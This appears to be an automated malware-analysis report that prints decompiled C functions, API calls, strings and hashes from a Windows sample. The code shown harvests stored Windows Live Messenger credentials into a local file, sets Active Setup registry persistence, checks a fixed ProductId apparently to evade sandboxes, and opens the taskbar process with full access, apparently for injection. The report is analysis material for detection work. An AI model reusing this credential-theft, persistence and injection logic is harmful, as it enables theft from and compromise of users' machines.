                                    				intOrPtr* _t70;
                                    				void* _t74;
                                    				intOrPtr _t76;
                                    				intOrPtr _t78;
                                    				signed int _t90;
                                    				void* _t91;
                                    				intOrPtr _t93;
                                    
                                    				_t89 = __esi;
                                    				_t70 = __eax;
                                    				 *[fs:eax] = _t93;
                                    				E00401AC0(__eax);
                                    				_v16 = LoadLibraryA("advapi32.dll");
                                    				 *0x40f1dc = GetProcAddress(_v16, "CredEnumerateA");
                                    				 *0x40f1e0 = GetProcAddress(_v16, "CredFree");
                                    				 *0x40f1dc("WindowsLive:name=*", 0,  &_v12,  &_v8,  *[fs:eax], 0x409e71, _t93, __edi, __esi, __ebx, 0, 0, 0, 0, 0, 0, 0, 0, _t91);
                                    				if(_v12 != 0) {
                                    					_t47 = _v12 - 1;
                                    					if(_t47 >= 0) {
                                    						_v20 = _t47 + 1;
                                    						_t90 = 0;
                                    						do {
                                    							_push( *_t70);
                                    							_push("Messenger|");
                                    							E00401CAC( &_v24,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x30)));
                                    							_push(_v24);
                                    							_push(0x409edc);
                                    							E00401E10();
                                    							_push( *_t70);
                                    							E00409C1C( *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x1c)), _t70,  &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x18)),  *((intOrPtr*)(_v8 + _t90 * 4)), _t90);
                                    							_push(_v32);
                                    							_push(0x409edc);
                                    							E00401E10();
                                    							E00401CAC(_t70, E00401F48(_v28));
                                    							_t90 = _t90 + 1;
                                    							_t21 =  &_v20;
                                    							 *_t21 = _v20 - 1;
                                    							_t97 =  *_t21;
                                    						} while ( *_t21 != 0);
                                    					}
                                    					FreeLibrary(_v16);
                                    					_push(E00401D50( *_t70));
                                    					E00406008( &_v36);
                                    					E00401D58( &_v36, "xxxyyyzzz.dat");
                                    					_pop(_t74);
                                    					E00405D70(_v36, _t70, _t74,  *_t70, _t89, _t97);
                                    				}
                                    				_pop(_t76);
                                    				 *[fs:eax] = _t76;
                                    				_push(E00409E78);
                                    				E00401AE4( &_v36, 4);
                                    				_t78 =  *0x409bec; // 0x409bf0
                                    				return E00402FC8( &_v8, _t78);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00409E71,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409D54
                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00409D65
                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00409D78
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryProc$FreeLoad
                                    • String ID: CredEnumerateA$CredFree$Messenger|$WindowsLive:name=*$advapi32.dll$xxxyyyzzz.dat
                                    • API String ID: 2256533930-2325380974
                                    • Opcode ID: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction ID: 58c175fa7aa483102e543733577c5d45540cb7646ec2fd880dc3ea0f10caa25c
                                    • Opcode Fuzzy Hash: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction Fuzzy Hash: 28311D75A00209AFDB01EFA5C842A9EB7B9EB48704B60447BF501B72D2D778ED058B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E0040806C(void* __eax, void* __ebx, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				CHAR* _t11;
                                    				struct HINSTANCE__* _t12;
                                    				CHAR* _t18;
                                    				struct HINSTANCE__* _t19;
                                    				CHAR* _t24;
                                    				struct HINSTANCE__* _t25;
                                    				CHAR* _t30;
                                    				struct HINSTANCE__* _t31;
                                    				intOrPtr _t44;
                                    				intOrPtr _t51;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_t48 = __eax;
                                    				_push(_t51);
                                    				_push(0x408182);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				if( *0x40d094 != 0) {
                                    					if( *0x40d098 == 0) {
                                    						E00401D9C( &_v12, 0x4081ac, __eax);
                                    						_t11 = E00401F48(_v12);
                                    						_t12 =  *0x40e9b8; // 0x0
                                    						GetProcAddress(_t12, _t11);
                                    					} else {
                                    						_t18 = E00401F48(__eax);
                                    						_t19 =  *0x40e9b8; // 0x0
                                    						GetProcAddress(_t19, _t18);
                                    					}
                                    					L11:
                                    					_pop(_t44);
                                    					 *[fs:eax] = _t44;
                                    					_push(E00408189);
                                    					return E00401AE4( &_v12, 2);
                                    				}
                                    				 *0x40e9b8 = LoadLibraryA("rasapi32.dll");
                                    				if( *0x40e9b8 == 0) {
                                    					 *0x40e9b8 = LoadLibraryA("rnaph.dll");
                                    					L5:
                                    					if( *0x40e9b8 != 0) {
                                    						_t24 = E00401F48(_t48);
                                    						_t25 =  *0x40e9b8; // 0x0
                                    						if(GetProcAddress(_t25, _t24) != 0) {
                                    							 *0x40d094 = 1;
                                    							 *0x40d098 = 1;
                                    						}
                                    					}
                                    					goto L11;
                                    				}
                                    				E00401D9C( &_v8, 0x4081ac, _t48);
                                    				_t30 = E00401F48(_v8);
                                    				_t31 =  *0x40e9b8; // 0x0
                                    				if(GetProcAddress(_t31, _t30) == 0) {
                                    					goto L5;
                                    				} else {
                                    					 *0x40d094 = 1;
                                    					goto L11;
                                    				}
                                    			}
                                    0x00000000
                                    0x004080d5

                                    APIs
                                    • LoadLibraryA.KERNEL32(rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 00408099
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004080CA
                                    • LoadLibraryA.KERNEL32(rnaph.dll,rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 004080E6
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408107
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408139
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408160
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: rasapi32.dll$rnaph.dll
                                    • API String ID: 2238633743-3306964077
                                    • Opcode ID: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction ID: b6a237a201236b193b27059562e9ff659002eca3acc9512b3faa464904049123
                                    • Opcode Fuzzy Hash: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction Fuzzy Hash: 88218070604240AFE765EBB59F42B5A369C9B08308F14487EF184BB3D2CB7C9D96835D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E004063FC(long __eax, intOrPtr* __edx) {
                                    				void* _v8;
                                    				void* _t8;
                                    				_Unknown_base(*)()* _t13;
                                    				intOrPtr* _t29;
                                    				intOrPtr _t37;
                                    				long _t43;
                                    				intOrPtr _t47;
                                    				intOrPtr _t49;
                                    
                                    				_t47 = _t49;
                                    				_t29 = __edx;
                                    				_t43 = __eax;
                                    				E00401AC0(__edx);
                                    				_t8 = OpenProcess(0x410, 0, _t43);
                                    				_v8 = _t8;
                                    				if(_v8 == 0) {
                                    					return _t8;
                                    				} else {
                                    					_push(_t47);
                                    					_push(0x4064a9);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t49;
                                    					E00402074(_t29, 0x104);
                                    					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
                                    					_push(0x104);
                                    					_push(E00401F48( *_t29));
                                    					_push(0);
                                    					_push(_v8);
                                    					if( *_t13() <= 0) {
                                    						E00401AC0(_t29);
                                    					} else {
                                    						E00402074(_t29, E004063EC(E00401F48( *_t29)));
                                    					}
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    					_push(0x4064b0);
                                    					return CloseHandle(_v8);
                                    				}
                                    			}
                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction ID: bd0c567add07f6e237ff98e8278f53c40e5ea01a94fcde37a46f9e1c644737da
                                    • Opcode Fuzzy Hash: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction Fuzzy Hash: 2911AC71700200BFE710BABA8D42B5A76DCDB85B58F22087BF606F72C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E004063FA(long __eax, intOrPtr* __edx) {
                                    				void* _v8;
                                    				void* _t8;
                                    				_Unknown_base(*)()* _t13;
                                    				intOrPtr* _t29;
                                    				intOrPtr _t37;
                                    				long _t43;
                                    				intOrPtr _t47;
                                    				intOrPtr _t49;
                                    
                                    				_t47 = _t49;
                                    				_t29 = __edx;
                                    				_t43 = __eax;
                                    				E00401AC0(__edx);
                                    				_t8 = OpenProcess(0x410, 0, _t43);
                                    				_v8 = _t8;
                                    				if(_v8 == 0) {
                                    					return _t8;
                                    				} else {
                                    					_push(_t47);
                                    					_push(0x4064a9);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t49;
                                    					E00402074(_t29, 0x104);
                                    					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
                                    					_push(0x104);
                                    					_push(E00401F48( *_t29));
                                    					_push(0);
                                    					_push(_v8);
                                    					if( *_t13() <= 0) {
                                    						E00401AC0(_t29);
                                    					} else {
                                    						E00402074(_t29, E004063EC(E00401F48( *_t29)));
                                    					}
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    					_push(0x4064b0);
                                    					return CloseHandle(_v8);
                                    				}
                                    			}
                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction ID: 60ef08ce5071abddf90c8e8173ba23e59c29dd9c076ad28b438bd73e609ca94b
                                    • Opcode Fuzzy Hash: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction Fuzzy Hash: 4501AD70700200BFE710AABA8C42F6B76DCDB45B48F52047ABA01F73C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00404460(void* __eax, void* __ecx) {
                                    				struct HINSTANCE__* _t2;
                                    				struct HINSTANCE__* _t4;
                                    				struct HINSTANCE__* _t6;
                                    				void* _t8;
                                    				struct HRSRC__* _t15;
                                    				void* _t16;
                                    				long _t22;
                                    				void* _t24;
                                    
                                    				_t24 = __eax;
                                    				_t2 =  *0x40e670; // 0x400000
                                    				_t15 = FindResourceA(_t2, "XX-XX-XX-XX", 0xa);
                                    				_t4 =  *0x40e670; // 0x400000
                                    				_t22 = SizeofResource(_t4, _t15);
                                    				_t6 =  *0x40e670; // 0x400000
                                    				_t16 = LoadResource(_t6, _t15);
                                    				_t8 = LockResource(_t16);
                                    				_t23 = _t8;
                                    				if(_t8 != 0) {
                                    					E00402074(_t24, _t22 - 1);
                                    					E00403730(E00401F9C(_t24), _t23);
                                    					return FreeResource(_t16);
                                    				}
                                    				return _t8;
                                    			}
                                    0x00404464
                                    0x0040446d
                                    0x00404478
                                    0x0040447b
                                    0x00404486
                                    0x00404489
                                    0x00404494
                                    0x00404497
                                    0x0040449c
                                    0x004044a0
                                    0x004044a7
                                    0x004044b7
                                    0x00000000
                                    0x004044bd
                                    0x004044c6

                                    APIs
                                    • FindResourceA.KERNEL32(00400000,XX-XX-XX-XX,0000000A), ref: 00404473
                                    • SizeofResource.KERNEL32(00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000,00000000,00000000), ref: 00404481
                                    • LoadResource.KERNEL32(00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000), ref: 0040448F
                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 00404497
                                    • FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 004044BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindFreeLoadLockSizeof
                                    • String ID: XX-XX-XX-XX
                                    • API String ID: 4159136517-2094075872
                                    • Opcode ID: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction ID: e8a3a0dff3016fb6e66adb29364c5155cbf347710d255ba4738bd85805777bce
                                    • Opcode Fuzzy Hash: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction Fuzzy Hash: 30F05E91B006143BC2507ABB6C81E3B668CAB8575A3840D3AB605FB392D97EDD0143BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405334() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
                                    					if( &_v264 == "55274-640-2673064-23950") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272);
                                    				return _t15;
                                    			}
                                    0x0040533b
                                    0x00405353
                                    0x00405355
                                    0x00405375
                                    0x00405383
                                    0x00405385
                                    0x00405385
                                    0x00405383
                                    0x0040538b
                                    0x00405399

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040534C
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000), ref: 00405375
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040538B
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405342
                                    • 55274-640-2673064-23950, xrefs: 0040537E
                                    • ProductId, xrefs: 0040536B
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 55274-640-2673064-23950$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-2078682219
                                    • Opcode ID: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction ID: 1e6d94a0f8f115d3a99371f43301c37098f18dfbe8dcc5c06d224e81d40a16f2
                                    • Opcode Fuzzy Hash: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction Fuzzy Hash: 66F012706447007AD610DA94CC82F9FB79CDB51754F20483AFD44FA1C1D2FDE9489B6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E004068B4(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                    				void* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				void* _t26;
                                    				intOrPtr _t27;
                                    				void* _t28;
                                    				void* _t43;
                                    				intOrPtr _t53;
                                    				intOrPtr _t54;
                                    				intOrPtr _t62;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_t43 = __ecx;
                                    				_push(_t62);
                                    				_push(0x40698a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t62;
                                    				E00401CAC( &_v16, __edx);
                                    				E00401D9C( &_v12, _v16, "Software\\Microsoft\\Active Setup\\Installed Components\\");
                                    				RegCreateKeyExA(0x80000002, E00401F48(_v12), 0, 0, 0, 2, 0,  &_v8, 0);
                                    				E00401CAC( &_v20, _t43);
                                    				_t26 = E00401D50(_v20);
                                    				_t27 =  *0x40d090; // 0x0
                                    				_t28 = E00401D50(_t27);
                                    				E00401CAC( &_v24, _t43);
                                    				_t53 =  *0x40d090; // 0x0
                                    				E00401D58( &_v24, _t53);
                                    				RegSetValueExA(_v8, "StubPath", 0, 1, E00401F48(_v24), _t26 + _t28);
                                    				RegCloseKey(_v8);
                                    				_pop(_t54);
                                    				 *[fs:eax] = _t54;
                                    				_push(E00406991);
                                    				return E00401AE4( &_v24, 4);
                                    			}
                                    0x004068b7
                                    0x004068b9
                                    0x004068bb
                                    0x004068bd
                                    0x004068bf
                                    0x004068c3
                                    0x004068c9
                                    0x004068ca
                                    0x004068cf
                                    0x004068d2
                                    0x004068ea
                                    0x004068fa
                                    0x0040690d
                                    0x00406917
                                    0x0040691f
                                    0x00406926
                                    0x0040692b
                                    0x00406938
                                    0x00406940
                                    0x00406946
                                    0x00406961
                                    0x0040696a
                                    0x00406971
                                    0x00406974
                                    0x00406977
                                    0x00406989

                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,0040698A,?,?,?,00000000,00000000), ref: 0040690D
                                    • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00406961
                                    • RegCloseKey.ADVAPI32(?,?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040696A
                                    Strings
                                    • StubPath, xrefs: 00406958
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004068F5
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$StubPath
                                    • API String ID: 1818849710-1145743385
                                    • Opcode ID: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction ID: fbe9536e074d3ad2c9ece0b486aa800bdd175237d852bd473bb7d96c7317ef30
                                    • Opcode Fuzzy Hash: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction Fuzzy Hash: 1B216374A502087BEB00EBA1CC42FAE73ACEB44708F614077F905F76E1D678AE01866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00407CAC(void* __eax, void* __ebx, void* __ecx) {
                                    				char _v8;
                                    				long _v12;
                                    				long _v16;
                                    				long _v20;
                                    				union _SID_NAME_USE _v24;
                                    				void* _v28;
                                    				void _v284;
                                    				char _v540;
                                    				void* _t50;
                                    				intOrPtr _t56;
                                    				void* _t60;
                                    
                                    				_v8 = 0;
                                    				_t50 = __eax;
                                    				_push(_t60);
                                    				_push(0x407d81);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t60 + 0xfffffde8;
                                    				E00401AC0(__eax);
                                    				E00402074( &_v8, 0x100);
                                    				_v12 = 0xff;
                                    				if(GetUserNameA(E00401F9C( &_v8),  &_v12) != 0) {
                                    					_v16 = 0xff;
                                    					_v20 = 0xff;
                                    					if(LookupAccountNameA(0, E00401F9C( &_v8),  &_v284,  &_v16,  &_v540,  &_v20,  &_v24) != 0 && IsValidSid( &_v284) != 0) {
                                    						_push( &_v28);
                                    						_push( &_v284);
                                    						L00407B54();
                                    						E00401CAC(_t50, _v28);
                                    						GlobalFree(_v28);
                                    					}
                                    				}
                                    				_pop(_t56);
                                    				 *[fs:eax] = _t56;
                                    				_push(E00407D88);
                                    				return E00401AC0( &_v8);
                                    			}

                                    Instruction addresses (one per statement above): 0x00407cb8, 0x00407cbb, 0x00407cbf, 0x00407cc0, 0x00407cc5, 0x00407cc8, 0x00407ccd, 0x00407cda, 0x00407cdf, 0x00407cfa, 0x00407cfc, 0x00407d03, 0x00407d36, 0x00407d4b, 0x00407d52, 0x00407d53, 0x00407d5d, 0x00407d66, 0x00407d66, 0x00407d36, 0x00407d6d, 0x00407d70, 0x00407d73, 0x00407d80

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                    • LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                    • IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                    • GlobalFree.KERNEL32(?), ref: 00407D66
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Name$AccountConvertFreeGlobalLookupStringUserValid
                                    • String ID:
                                    • API String ID: 1214381313-0
                                    • Opcode ID: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction ID: cb8f30fe2752fb84fa2a751701b307f0b12e4b3c054cd12de1de141c6e833035
                                    • Opcode Fuzzy Hash: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction Fuzzy Hash: 0A214F71D0420DABDB11EFA1CD829EFB7BCAF08304F504577B500F2191EB38AB458A69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E0040AFB0(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				intOrPtr _t49;
                                    				void* _t55;
                                    
                                    				_v20 = 0;
                                    				_v16 = 0;
                                    				_push(_t55);
                                    				_push(0x40b062);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t55 + 0xfffffff0;
                                    				E004013A4(0,  &_v16);
                                    				_t52 = E00401F48(_v16);
                                    				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
                                    				_t37 = OpenProcess(0x1f0fff, 0, _v8);
                                    				E00401CAC( &_v20, _t17);
                                    				_v12 = E0040AEBC(_t22, E00401D50(_v20), _t52);
                                    				E0040AF08(_t37, E0040AEBC(_t37, 4,  &_v12), E0040AE94);
                                    				_pop(_t49);
                                    				 *[fs:eax] = _t49;
                                    				_push(E0040B069);
                                    				return E00401AE4( &_v20, 2);
                                    			}

                                    Instruction addresses (one per statement above): 0x0040afba, 0x0040afbd, 0x0040afc2, 0x0040afc3, 0x0040afc8, 0x0040afcb, 0x0040afd3, 0x0040afe0, 0x0040aff3, 0x0040b008, 0x0040b00f, 0x0040b027, 0x0040b042, 0x0040b049, 0x0040b04c, 0x0040b04f, 0x0040b061

                                    APIs
                                      • Part of subcall function 004013A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040AFED
